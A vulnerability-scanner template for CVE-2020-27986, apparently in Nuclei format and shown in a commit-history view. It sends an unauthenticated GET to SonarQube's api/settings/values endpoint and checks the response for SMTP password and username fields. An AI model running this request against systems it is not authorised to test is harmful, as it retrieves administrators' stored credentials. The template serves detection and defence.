2021-01-30 09:51:50 +00:00
|
|
|
id: CVE-2020-27986
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: SonarQube unauth
|
|
|
|
author: pikpikcu
|
2021-09-10 11:26:40 +00:00
|
|
|
severity: high
|
2021-01-30 09:51:50 +00:00
|
|
|
description: |
|
2021-08-19 14:44:46 +00:00
|
|
|
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
|
|
|
|
SVN, and GitLab credentials via the api/settings/values URI.
|
|
|
|
NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
|
2021-08-18 11:29:20 +00:00
|
|
|
reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/
|
2021-02-05 19:44:41 +00:00
|
|
|
tags: cve,cve2020,sonarqube
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.50
|
|
|
|
cve-id: CVE-2020-27986
|
|
|
|
cwe-id: CWE-306,CWE-312
|
2021-01-30 09:51:50 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/api/settings/values"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2021-01-30 13:52:02 +00:00
|
|
|
- email.smtp_host.secured
|
|
|
|
- email.smtp_password.secured
|
|
|
|
- email.smtp_port.secured
|
|
|
|
- email.smtp_username.secured
|
2021-01-30 09:51:50 +00:00
|
|
|
part: body
|
2021-03-10 14:03:49 +00:00
|
|
|
condition: and
|
2021-01-30 09:51:50 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|